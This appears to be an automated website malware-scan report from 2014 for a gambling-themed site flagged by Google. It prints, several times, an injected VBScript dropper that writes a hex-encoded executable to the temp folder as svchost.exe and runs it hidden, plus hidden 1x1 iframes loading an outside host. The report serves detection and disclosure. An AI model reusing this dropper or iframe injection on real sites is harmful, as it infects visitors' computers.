Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=huijiayz.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://huijiayz.com/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 15:00:08 GMT Accept-Ranges: bytes ETag: "aed597a34d9fcf1:e83" Server: Microsoft-IIS/6.0 Content-Length: 125125 Content-Location: http://huijiayz.com/index.html Content-Type: text/html Last-Modified: Mon, 14 Jul 2014 10:23:22 GMT | clean |
http://huijiayz.com/index.html | 200 OK Content-Length: 125125 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3625 bytes skipped]... Antivirus reports:
| ||
http://huijiayz.com/common.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://huijiayz.com/tj.js | 200 OK Content-Length: 146 Content-Type: application/x-javascript | clean |
http://huijiayz.com/sitemap.html | 200 OK Content-Length: 147937 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://huijiayz.com/bet365ylc/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 15:00:14 GMT Accept-Ranges: bytes ETag: "dc8b2ca34d9fcf1:e83" Server: Microsoft-IIS/6.0 Content-Length: 126448 Content-Location: http://huijiayz.com/bet365ylc/index.html Content-Type: text/html Last-Modified: Mon, 14 Jul 2014 10:23:21 GMT | clean |
http://huijiayz.com/bet365ylc/index.html | 200 OK Content-Length: 126448 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://huijiayz.com/bet365/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 15:00:17 GMT Accept-Ranges: bytes ETag: "8ca2d54e429ecf1:e83" Server: Microsoft-IIS/6.0 Content-Length: 126282 Content-Location: http://huijiayz.com/bet365/index.html Content-Type: text/html Last-Modified: Sun, 13 Jul 2014 02:29:44 GMT | clean |
http://huijiayz.com/bet365/index.html | 200 OK Content-Length: 126282 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://huijiayz.com/365betgw/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 15:00:21 GMT Accept-Ranges: bytes ETag: "f23432a24d9fcf1:e83" Server: Microsoft-IIS/6.0 Content-Length: 126228 Content-Location: http://huijiayz.com/365betgw/index.html Content-Type: text/html Last-Modified: Mon, 14 Jul 2014 10:23:19 GMT | clean |
http://huijiayz.com/365betgw/index.html | 200 OK Content-Length: 126228 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://huijiayz.com/365betgw/134.html | 200 OK Content-Length: 129614 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3622 bytes skipped]... Antivirus reports:
| ||
http://huijiayz.com/365betgw/5.html | 200 OK Content-Length: 128002 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3625 bytes skipped]... Antivirus reports:
| ||
http://huijiayz.com/365betgw/2.html | 200 OK Content-Length: 127226 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3621 bytes skipped]... Antivirus reports:
| ||
http://huijiayz.com/365betgw/1.html | 200 OK Content-Length: 126613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3625 bytes skipped]... Antivirus reports:
| ||
http://huijiayz.com/test404page.js | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 15:00:31 GMT Accept-Ranges: bytes ETag: "265caeb889ccf1:e83" Server: Microsoft-IIS/6.0 Content-Length: 114586 Content-Location: http://huijiayz.com/404.html?404;http://huijiayz.com:80/test404page.js Content-Type: text/html Last-Modified: Thu, 10 Jul 2014 21:50:08 GMT | clean |
http://huijiayz.com/404.html?404;http://huijiayz.com:80/test404page.js | 200 OK Content-Length: 114586 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/x-javascript | clean |
http://huijiayz.com/bet365/4.html | 200 OK Content-Length: 127877 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://huijiayz.com/bet365/3.html | 200 OK Content-Length: 127744 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3625 bytes skipped]... Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: huijiayz.com
Result:
HTTP/1.1 200 OK
Date: Thu, 24 Jul 2014 15:00:08 GMT
Accept-Ranges: bytes
ETag: "aed597a34d9fcf1:e83"
Server: Microsoft-IIS/6.0
Content-Length: 125125
Content-Location: http://huijiayz.com/index.html
Content-Type: text/html
Last-Modified: Mon, 14 Jul 2014 10:23:22 GMT
...125125 bytes of data.
GET / HTTP/1.1
Host: huijiayz.com
Result:
HTTP/1.1 200 OK
Date: Thu, 24 Jul 2014 15:00:08 GMT
Accept-Ranges: bytes
ETag: "aed597a34d9fcf1:e83"
Server: Microsoft-IIS/6.0
Content-Length: 125125
Content-Location: http://huijiayz.com/index.html
Content-Type: text/html
Last-Modified: Mon, 14 Jul 2014 10:23:22 GMT
...125125 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: huijiayz.com
Referer: http://www.google.com/search?q=huijiayz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: huijiayz.com
Referer: http://www.google.com/search?q=huijiayz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.